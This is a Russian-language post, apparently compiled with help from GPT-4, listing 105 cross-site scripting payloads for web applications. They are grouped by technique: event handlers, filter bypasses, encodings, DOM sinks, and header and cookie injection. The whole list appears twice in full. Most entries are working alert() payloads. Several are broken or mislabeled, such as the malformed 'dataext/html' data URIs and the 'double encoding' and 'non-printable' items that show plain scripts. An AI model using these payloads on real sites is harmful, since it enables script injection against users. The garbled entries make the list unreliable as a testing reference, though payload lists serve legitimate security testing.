Всем привет собрал для вас понятные примеры для тестинга xss помогал GPT-4
Вот обширный список примеров для тестирования на уязвимость XSS, от простых до сложных. Эти примеры помогут вам выявить и понять возможные векторы атаки XSS на вашем сайте.
### Простые XSS
1. **Всплывающее окно с сообщением:**
```html
<script>alert('XSS')</script>
```
2. **Всплывающее окно с кодировкой HTML-энтити:**
```html
<script>alert('XSS'
</script>
```
3. **Код в `img` тег:**
```html
<img src="x" onerror="alert('XSS')">
```
4. **Код в `a` тег:**
```html
<a href="javascript:alert('XSS')">Click me</a>
```
5. **Код в `iframe` тег:**
```html
<iframe src="javascript:alert('XSS')"></iframe>
```
### Средние XSS
6. **Код в `input` тег:**
```html
<input type="text" value="<script>alert('XSS')">
```
7. **Использование CSS:**
```html
<div style="background-image: url('javascript:alert(\'XSS\')')"></div>
```
8. **Код в `body` тег:**
```html
<body onload="alert('XSS')">
```
9. **Использование `onmouseover` атрибута:**
```html
<div onmouseover="alert('XSS')">Hover over me</div>
```
10. **Использование `onfocus` атрибута:**
```html
<input onfocus="alert('XSS')" autofocus>
```
### Сложные XSS
11. **SVG инъекция:**
```html
<svg/onload=alert('XSS')>
```
12. **XML инъекция:**
```xml
<foo><bar><![CDATA[<script>alert('XSS')</script>]]></bar></foo>
```
13. **Код в `textarea`:**
```html
<textarea><script>alert('XSS')</script></textarea>
```
14. **Код в комментарии:**
```html
<!-- <script>alert('XSS')</script> -->
```
15. **Код в `style` тег:**
```html
<style>@import 'javascript:alert("XSS")';</style>
```
### Обход фильтров
16. **Использование нестандартного экранирования:**
```html
<scr<script>ipt>alert('XSS')</scr<script>ipt>
```
17. **Использование закомментированных тегов:**
```html
<<!-- -->script>alert('XSS')<<!-- -->/script>
```
18. **Использование `onerror` в изображении:**
```html
<img src="nonexistent.jpg" onerror="alert('XSS')">
```
19. **Использование `onload` в `iframe`:**
```html
<iframe src="about:blank" onload="alert('XSS')"></iframe>
```
20. **SVG с JavaScript:**
```html
<svg><script>alert('XSS')</script></svg>
```
### Использование различных событий
21. **Использование `onkeypress`:**
```html
<input onkeypress="alert('XSS')">
```
22. **Использование `onclick`:**
```html
<div onclick="alert('XSS')">Click me</div>
```
23. **Использование `ondblclick`:**
```html
<div ondblclick="alert('XSS')">Double-click me</div>
```
24. **Использование `onmousedown`:**
```html
<div onmousedown="alert('XSS')">Click and hold me</div>
```
25. **Использование `onmouseup`:**
```html
<div onmouseup="alert('XSS')">Release click over me</div>
```
### Динамическое создание скриптов
26. **Динамическое создание через JavaScript:**
```html
<script>document.write("<script>alert('XSS')<\/script>")</script>
```
27. **Использование `setTimeout`:**
```html
<script>setTimeout("alert('XSS')", 1000)</script>
```
28. **Использование `setInterval`:**
```html
<script>setInterval("alert('XSS')", 1000)</script>
```
29. **Использование `eval`:**
```html
<script>eval("alert('XSS')")</script>
```
30. **Использование `Function` конструктор:**
```html
<script>new Function("alert('XSS')")()</script>
```
### Эксплуатация DOM
31. **Использование `innerHTML`:**
```html
<div id="xss"></div>
<script>document.getElementById('xss').innerHTML = "<script>alert('XSS')<\/script>"</script>
```
32. **Использование `outerHTML`:**
```html
<div id="xss"></div>
<script>document.getElementById('xss').outerHTML = "<script>alert('XSS')<\/script>"</script>
```
33. **Использование `insertAdjacentHTML`:**
```html
<div id="xss"></div>
<script>document.getElementById('xss').insertAdjacentHTML('beforeend', "<script>alert('XSS')<\/script>")</script>
```
34. **Использование `document.write`:**
```html
<script>document.write("<script>alert('XSS')<\/script>")</script>
```
35. **Использование `location`:**
```html
<script>location="javascript:alert('XSS')"</script>
```
### Использование атрибутов HTML5
36. **Использование `srcdoc` в `iframe`:**
```html
<iframe srcdoc="<script>alert('XSS')<\/script>"></iframe>
```
37. **Использование `formaction` в `button`:**
```html
<form><button formaction="javascript:alert('XSS')">Submit</button></form>
```
38. **Использование `formaction` в `input`:**
```html
<form><input type="submit" formaction="javascript:alert('XSS')"></form>
```
39. **Использование `placeholder` в `input`:**
```html
<input placeholder="<script>alert('XSS')">
```
40. **Использование `pattern` в `input`:**
```html
<input pattern=".*" oninvalid="alert('XSS')">
```
### Использование URL-параметров
41. **XSS в URL параметрах:**
```url
http://example.com/page?param=<script>alert('XSS')</script>
```
42. **XSS в якоре (fragment):**
```url
http://example.com/#<script>alert('XSS')</script>
```
43. **XSS в данных формы (GET):**
```url
http://example.com/search?q=<script>alert('XSS')</script>
```
44. **XSS в данных формы (POST):**
```html
<form method="post" action="http://example.com/search">
<input type="text" name="q" value="<script>alert('XSS')">
</form>
```
45. **XSS через AJAX:**
```javascript
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://example.com/page?param=<script>alert('XSS')</script>", true);
xhr.send();
```
### Сложные сценарии
46. **Кодировка URL:**
```html
<a href="http://example.com/page?param=<script>alert('XSS')</script>">Click me</a>
```
47. **Кодировка Base64:**
```html
<script>
var script = atob("PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=");
document.write(script);
</script>
```
48. **Кодировка в шестнадцатеричном формате:**
```html
<script>
var script = "\x3C\x73\x63\x72\x69\x70\x74\x3E\x61\x6C\x65\x72\x74\x28\x27\x58\x53\x53\x27\x29\x3C\x2
F\x73\x63\x72\x69\x70\x74\x3E";
document.write(script);
</script>
```
49. **JavaScript в CSS:**
```html
<style>body{background:url("javascript:alert('XSS')")}</style>
```
50. **Использование WebSocket:**
```javascript
var ws = new WebSocket('ws://example.com/socket');
ws.onopen = function() {
ws.send("<script>alert('XSS')</script>");
};
```
### Тестирование атрибутов
51. **`href` атрибут в ссылке:**
```html
<a href="javascript:alert('XSS')">Click me</a>
```
52. **`src` атрибут в изображении:**
```html
<img src="javascript:alert('XSS')">
```
53. **`background` атрибут в таблице:**
```html
<table background="javascript:alert('XSS')">
```
54. **`data` атрибут в object:**
```html
<object data="javascript:alert('XSS')">
```
55. **`codebase` атрибут в applet:**
```html
<applet codebase="javascript:alert('XSS')"></applet>
```
### Более сложные проверки
56. **JSONP инъекция:**
```javascript
<script src="http://example.com/api?callback=alert('XSS')"></script>
```
57. **Кодировка в JSON:**
```javascript
<script>
var json = '{"key":"<script>alert(\'XSS\')</script>"}';
var obj = JSON.parse(json);
document.write(obj.key);
</script>
```
58. **XML инъекция:**
```xml
<foo>
<bar><![CDATA[<script>alert('XSS')</script>]]></bar>
</foo>
```
59. **Использование Data URI:**
```html
<a href="dataext/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">Click me</a>
```
60. **Использование Blob URI:**
```html
<script>
var blob = new Blob(["<script>alert('XSS')<\/script>"], { type: 'text/html' });
var url = URL.createObjectURL(blob);
var iframe = document.createElement('iframe');
iframe.src = url;
document.body.appendChild(iframe);
</script>
```
### Проверка с использованием различных браузеров
61. **IE-specific XSS:**
```html
<!--[if gte IE 4]>
<script>alert('XSS')</script>
<![endif]-->
```
62. **Firefox-specific XSS:**
```html
<div style="-moz-binding:url('http://example.com/xss.xml#xss')">XSS</div>
```
63. **Opera-specific XSS:**
```html
<div style="behavior:url('http://example.com/xss.htc')">XSS</div>
```
64. **Chrome-specific XSS:**
```html
<script>
window.open('javascript:alert("XSS")');
</script>
```
65. **Safari-specific XSS:**
```html
<script>
location='javascript:alert("XSS")';
</script>
```
### Использование различных тегов
66. **`base` тег:**
```html
<base href="javascript:alert('XSS');">
```
67. **`meta` тег:**
```html
<meta http-equiv="refresh" content="0;url=javascript:alert('XSS');">
```
68. **`link` тег:**
```html
<link rel="stylesheet" href="javascript:alert('XSS');">
```
69. **`form` тег:**
```html
<form action="javascript:alert('XSS');">
<input type="submit">
</form>
```
70. **`button` тег:**
```html
<button onclick="alert('XSS')">Click me</button>
```
### Использование различных методов экранирования
71. **Hexadecimal encoding:**
```html
<script>alert('\x58\x53\x53')</script>
```
72. **Octal encoding:**
```html
<script>alert('\130\123\123')</script>
```
73. **Base64 encoding:**
```html
<script>
var script = atob('PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=');
document.write(script);
</script>
```
74. **UTF-8 encoding:**
```html
<script>alert('\u0058\u0053\u0053')</script>
```
75. **Unicode escape sequence:**
```html
<script>alert('\u0058\u0053\u0053')</script>
```
### Использование различных техник вставки
76. **Multiple encoding:**
```html
<script>alert('XSS')</script>
```
77. **Null byte injection:**
```html
<script>alert('XSS\0')</script>
```
78. **Breaking out of tags:**
```html
</title><script>alert('XSS')</script>
```
79. **Breaking out of attributes:**
```html
"><script>alert('XSS')</script>
```
80. **Breaking out of comments:**
```html
--> <script>alert('XSS')</script>
```
### Проверка с использованием различных файлов
81. **XSS в PDF:**
```html
<a href="http://example.com/xss.pdf">Download PDF</a>
```
82. **XSS в Flash:**
```html
<embed src="http://example.com/xss.swf">
```
83. **XSS в SVG:**
```html
<svg>
<script>alert('XSS')</script>
</svg>
```
84. **XSS в VML:**
```html
<xml>
<v:shape id="xss" style="behavior:url(#default#VML);" />
<script>alert('XSS')</script>
</xml>
```
85. **XSS в Markdown:**
```markdown
[Click me](javascript:alert('XSS'))
```
### Проверка с использованием различных протоколов
86. **JavaScript URI:**
```html
<a href="javascript:alert('XSS')">Click me</a>
```
87. **Data URI:**
```html
<a href="dataext/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">Click me</a>
```
88. **VBScript URI:**
```html
<a href="vbscript:msgbox('XSS')">Click me</a>
```
89. **file:// URI:**
```html
<a href="file:///C:/Windows/System32/calc.exe">Open Calculator</a>
```
90. **ftp:// URI:**
```html
<a href="ftp://example.com/">Open FTP</a>
```
### Проверка с использованием различных техник обхода
91. **Double encoding:**
```html
<script>alert('XSS')</script>
```
92. **Half-open HTML tags:**
```html
<script>alert('XSS')</script
```
93. **Malformed HTML:**
```html
<script>alert('XSS')</script><foo
```
94. **Non-printable characters:**
```html
<script>alert('XSS')</script>
```
95. **Unclosed quotes:**
```html
<script>alert('XSS')</script>
```
### Примеры для различных контекстов
96. **XSS в URL:**
```url
http://example.com/page?param=<script>alert('XSS')</script>
```
97. **XSS в заголовках HTTP:**
```http
GET /page HTTP/1.1
Host: example.com
User-Agent: <script>alert('XSS')</script>
```
98. **XSS в cookies:**
```http
Set-Cookie: session=<script>alert('XSS')</script>;
```
99. **XSS в Referer:**
```http
Referer: http://example.com/<script>alert('XSS')</script>
```
100. **XSS в JSON:**
```json
{"key":"<script>alert('XSS')</script>"}
```
### Дополнительные сложные проверки
101. **
XSS через DOM:**
```html
<script>
var xss = "<script>alert('XSS')<\/script>";
document.write(xss);
</script>
```
102. **XSS через eval:**
```html
<script>
eval("alert('XSS')");
</script>
```
103. **XSS через setTimeout:**
```html
<script>
setTimeout("alert('XSS')", 1000);
</script>
```
104. **XSS через setInterval:**
```html
<script>
setInterval("alert('XSS')", 1000);
</script>
```
105. **XSS через innerHTML:**
```html
<script>
document.body.innerHTML = "<script>alert('XSS')<\/script>";
</script>
```
Эти примеры помогут вам глубже понять и протестировать различные аспекты уязвимостей XSS в вашем приложении. Обязательно используйте их ответственно и только в контексте безопасного тестирования.
Вот обширный список примеров для тестирования на уязвимость XSS, от простых до сложных. Эти примеры помогут вам выявить и понять возможные векторы атаки XSS на вашем сайте.
### Простые XSS
1. **Всплывающее окно с сообщением:**
```html
<script>alert('XSS')</script>
```
2. **Всплывающее окно с кодировкой HTML-энтити:**
```html
<script>alert('XSS'
</script>```
3. **Код в `img` тег:**
```html
<img src="x" onerror="alert('XSS')">
```
4. **Код в `a` тег:**
```html
<a href="javascript:alert('XSS')">Click me</a>
```
5. **Код в `iframe` тег:**
```html
<iframe src="javascript:alert('XSS')"></iframe>
```
### Средние XSS
6. **Код в `input` тег:**
```html
<input type="text" value="<script>alert('XSS')">
```
7. **Использование CSS:**
```html
<div style="background-image: url('javascript:alert(\'XSS\')')"></div>
```
8. **Код в `body` тег:**
```html
<body onload="alert('XSS')">
```
9. **Использование `onmouseover` атрибута:**
```html
<div onmouseover="alert('XSS')">Hover over me</div>
```
10. **Использование `onfocus` атрибута:**
```html
<input onfocus="alert('XSS')" autofocus>
```
### Сложные XSS
11. **SVG инъекция:**
```html
<svg/onload=alert('XSS')>
```
12. **XML инъекция:**
```xml
<foo><bar><![CDATA[<script>alert('XSS')</script>]]></bar></foo>
```
13. **Код в `textarea`:**
```html
<textarea><script>alert('XSS')</script></textarea>
```
14. **Код в комментарии:**
```html
<!-- <script>alert('XSS')</script> -->
```
15. **Код в `style` тег:**
```html
<style>@import 'javascript:alert("XSS")';</style>
```
### Обход фильтров
16. **Использование нестандартного экранирования:**
```html
<scr<script>ipt>alert('XSS')</scr<script>ipt>
```
17. **Использование закомментированных тегов:**
```html
<<!-- -->script>alert('XSS')<<!-- -->/script>
```
18. **Использование `onerror` в изображении:**
```html
<img src="nonexistent.jpg" onerror="alert('XSS')">
```
19. **Использование `onload` в `iframe`:**
```html
<iframe src="about:blank" onload="alert('XSS')"></iframe>
```
20. **SVG с JavaScript:**
```html
<svg><script>alert('XSS')</script></svg>
```
### Использование различных событий
21. **Использование `onkeypress`:**
```html
<input onkeypress="alert('XSS')">
```
22. **Использование `onclick`:**
```html
<div onclick="alert('XSS')">Click me</div>
```
23. **Использование `ondblclick`:**
```html
<div ondblclick="alert('XSS')">Double-click me</div>
```
24. **Использование `onmousedown`:**
```html
<div onmousedown="alert('XSS')">Click and hold me</div>
```
25. **Использование `onmouseup`:**
```html
<div onmouseup="alert('XSS')">Release click over me</div>
```
### Динамическое создание скриптов
26. **Динамическое создание через JavaScript:**
```html
<script>document.write("<script>alert('XSS')<\/script>")</script>
```
27. **Использование `setTimeout`:**
```html
<script>setTimeout("alert('XSS')", 1000)</script>
```
28. **Использование `setInterval`:**
```html
<script>setInterval("alert('XSS')", 1000)</script>
```
29. **Использование `eval`:**
```html
<script>eval("alert('XSS')")</script>
```
30. **Использование `Function` конструктор:**
```html
<script>new Function("alert('XSS')")()</script>
```
### Эксплуатация DOM
31. **Использование `innerHTML`:**
```html
<div id="xss"></div>
<script>document.getElementById('xss').innerHTML = "<script>alert('XSS')<\/script>"</script>
```
32. **Использование `outerHTML`:**
```html
<div id="xss"></div>
<script>document.getElementById('xss').outerHTML = "<script>alert('XSS')<\/script>"</script>
```
33. **Использование `insertAdjacentHTML`:**
```html
<div id="xss"></div>
<script>document.getElementById('xss').insertAdjacentHTML('beforeend', "<script>alert('XSS')<\/script>")</script>
```
34. **Использование `document.write`:**
```html
<script>document.write("<script>alert('XSS')<\/script>")</script>
```
35. **Использование `location`:**
```html
<script>location="javascript:alert('XSS')"</script>
```
### Использование атрибутов HTML5
36. **Использование `srcdoc` в `iframe`:**
```html
<iframe srcdoc="<script>alert('XSS')<\/script>"></iframe>
```
37. **Использование `formaction` в `button`:**
```html
<form><button formaction="javascript:alert('XSS')">Submit</button></form>
```
38. **Использование `formaction` в `input`:**
```html
<form><input type="submit" formaction="javascript:alert('XSS')"></form>
```
39. **Использование `placeholder` в `input`:**
```html
<input placeholder="<script>alert('XSS')">
```
40. **Использование `pattern` в `input`:**
```html
<input pattern=".*" oninvalid="alert('XSS')">
```
### Использование URL-параметров
41. **XSS в URL параметрах:**
```url
http://example.com/page?param=<script>alert('XSS')</script>
```
42. **XSS в якоре (fragment):**
```url
http://example.com/#<script>alert('XSS')</script>
```
43. **XSS в данных формы (GET):**
```url
http://example.com/search?q=<script>alert('XSS')</script>
```
44. **XSS в данных формы (POST):**
```html
<form method="post" action="http://example.com/search">
<input type="text" name="q" value="<script>alert('XSS')">
</form>
```
45. **XSS через AJAX:**
```javascript
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://example.com/page?param=<script>alert('XSS')</script>", true);
xhr.send();
```
### Сложные сценарии
46. **Кодировка URL:**
```html
<a href="http://example.com/page?param=<script>alert('XSS')</script>">Click me</a>
```
47. **Кодировка Base64:**
```html
<script>
var script = atob("PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=");
document.write(script);
</script>
```
48. **Кодировка в шестнадцатеричном формате:**
```html
<script>
var script = "\x3C\x73\x63\x72\x69\x70\x74\x3E\x61\x6C\x65\x72\x74\x28\x27\x58\x53\x53\x27\x29\x3C\x2
F\x73\x63\x72\x69\x70\x74\x3E";
document.write(script);
</script>
```
49. **JavaScript в CSS:**
```html
<style>body{background:url("javascript:alert('XSS')")}</style>
```
50. **Использование WebSocket:**
```javascript
var ws = new WebSocket('ws://example.com/socket');
ws.onopen = function() {
ws.send("<script>alert('XSS')</script>");
};
```
### Тестирование атрибутов
51. **`href` атрибут в ссылке:**
```html
<a href="javascript:alert('XSS')">Click me</a>
```
52. **`src` атрибут в изображении:**
```html
<img src="javascript:alert('XSS')">
```
53. **`background` атрибут в таблице:**
```html
<table background="javascript:alert('XSS')">
```
54. **`data` атрибут в object:**
```html
<object data="javascript:alert('XSS')">
```
55. **`codebase` атрибут в applet:**
```html
<applet codebase="javascript:alert('XSS')"></applet>
```
### Более сложные проверки
56. **JSONP инъекция:**
```javascript
<script src="http://example.com/api?callback=alert('XSS')"></script>
```
57. **Кодировка в JSON:**
```javascript
<script>
var json = '{"key":"<script>alert(\'XSS\')</script>"}';
var obj = JSON.parse(json);
document.write(obj.key);
</script>
```
58. **XML инъекция:**
```xml
<foo>
<bar><![CDATA[<script>alert('XSS')</script>]]></bar>
</foo>
```
59. **Использование Data URI:**
```html
<a href="data
ext/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">Click me</a>```
60. **Использование Blob URI:**
```html
<script>
var blob = new Blob(["<script>alert('XSS')<\/script>"], { type: 'text/html' });
var url = URL.createObjectURL(blob);
var iframe = document.createElement('iframe');
iframe.src = url;
document.body.appendChild(iframe);
</script>
```
### Проверка с использованием различных браузеров
61. **IE-specific XSS:**
```html
<!--[if gte IE 4]>
<script>alert('XSS')</script>
<![endif]-->
```
62. **Firefox-specific XSS:**
```html
<div style="-moz-binding:url('http://example.com/xss.xml#xss')">XSS</div>
```
63. **Opera-specific XSS:**
```html
<div style="behavior:url('http://example.com/xss.htc')">XSS</div>
```
64. **Chrome-specific XSS:**
```html
<script>
window.open('javascript:alert("XSS")');
</script>
```
65. **Safari-specific XSS:**
```html
<script>
location='javascript:alert("XSS")';
</script>
```
### Использование различных тегов
66. **`base` тег:**
```html
<base href="javascript:alert('XSS');">
```
67. **`meta` тег:**
```html
<meta http-equiv="refresh" content="0;url=javascript:alert('XSS');">
```
68. **`link` тег:**
```html
<link rel="stylesheet" href="javascript:alert('XSS');">
```
69. **`form` тег:**
```html
<form action="javascript:alert('XSS');">
<input type="submit">
</form>
```
70. **`button` тег:**
```html
<button onclick="alert('XSS')">Click me</button>
```
### Использование различных методов экранирования
71. **Hexadecimal encoding:**
```html
<script>alert('\x58\x53\x53')</script>
```
72. **Octal encoding:**
```html
<script>alert('\130\123\123')</script>
```
73. **Base64 encoding:**
```html
<script>
var script = atob('PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=');
document.write(script);
</script>
```
74. **UTF-8 encoding:**
```html
<script>alert('\u0058\u0053\u0053')</script>
```
75. **Unicode escape sequence:**
```html
<script>alert('\u0058\u0053\u0053')</script>
```
### Использование различных техник вставки
76. **Multiple encoding:**
```html
<script>alert('XSS')</script>
```
77. **Null byte injection:**
```html
<script>alert('XSS\0')</script>
```
78. **Breaking out of tags:**
```html
</title><script>alert('XSS')</script>
```
79. **Breaking out of attributes:**
```html
"><script>alert('XSS')</script>
```
80. **Breaking out of comments:**
```html
--> <script>alert('XSS')</script>
```
### Проверка с использованием различных файлов
81. **XSS в PDF:**
```html
<a href="http://example.com/xss.pdf">Download PDF</a>
```
82. **XSS в Flash:**
```html
<embed src="http://example.com/xss.swf">
```
83. **XSS в SVG:**
```html
<svg>
<script>alert('XSS')</script>
</svg>
```
84. **XSS в VML:**
```html
<xml>
<v:shape id="xss" style="behavior:url(#default#VML);" />
<script>alert('XSS')</script>
</xml>
```
85. **XSS в Markdown:**
```markdown
[Click me](javascript:alert('XSS'))
```
### Проверка с использованием различных протоколов
86. **JavaScript URI:**
```html
<a href="javascript:alert('XSS')">Click me</a>
```
87. **Data URI:**
```html
<a href="data
ext/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">Click me</a>```
88. **VBScript URI:**
```html
<a href="vbscript:msgbox('XSS')">Click me</a>
```
89. **file:// URI:**
```html
<a href="file:///C:/Windows/System32/calc.exe">Open Calculator</a>
```
90. **ftp:// URI:**
```html
<a href="ftp://example.com/">Open FTP</a>
```
### Проверка с использованием различных техник обхода
91. **Double encoding:**
```html
<script>alert('XSS')</script>
```
92. **Half-open HTML tags:**
```html
<script>alert('XSS')</script
```
93. **Malformed HTML:**
```html
<script>alert('XSS')</script><foo
```
94. **Non-printable characters:**
```html
<script>alert('XSS')</script>
```
95. **Unclosed quotes:**
```html
<script>alert('XSS')</script>
```
### Примеры для различных контекстов
96. **XSS в URL:**
```url
http://example.com/page?param=<script>alert('XSS')</script>
```
97. **XSS в заголовках HTTP:**
```http
GET /page HTTP/1.1
Host: example.com
User-Agent: <script>alert('XSS')</script>
```
98. **XSS в cookies:**
```http
Set-Cookie: session=<script>alert('XSS')</script>;
```
99. **XSS в Referer:**
```http
Referer: http://example.com/<script>alert('XSS')</script>
```
100. **XSS в JSON:**
```json
{"key":"<script>alert('XSS')</script>"}
```
### Дополнительные сложные проверки
101. **
XSS через DOM:**
```html
<script>
var xss = "<script>alert('XSS')<\/script>";
document.write(xss);
</script>
```
102. **XSS через eval:**
```html
<script>
eval("alert('XSS')");
</script>
```
103. **XSS через setTimeout:**
```html
<script>
setTimeout("alert('XSS')", 1000);
</script>
```
104. **XSS через setInterval:**
```html
<script>
setInterval("alert('XSS')", 1000);
</script>
```
105. **XSS через innerHTML:**
```html
<script>
document.body.innerHTML = "<script>alert('XSS')<\/script>";
</script>
```
Эти примеры помогут вам глубже понять и протестировать различные аспекты уязвимостей XSS в вашем приложении. Обязательно используйте их ответственно и только в контексте безопасного тестирования.
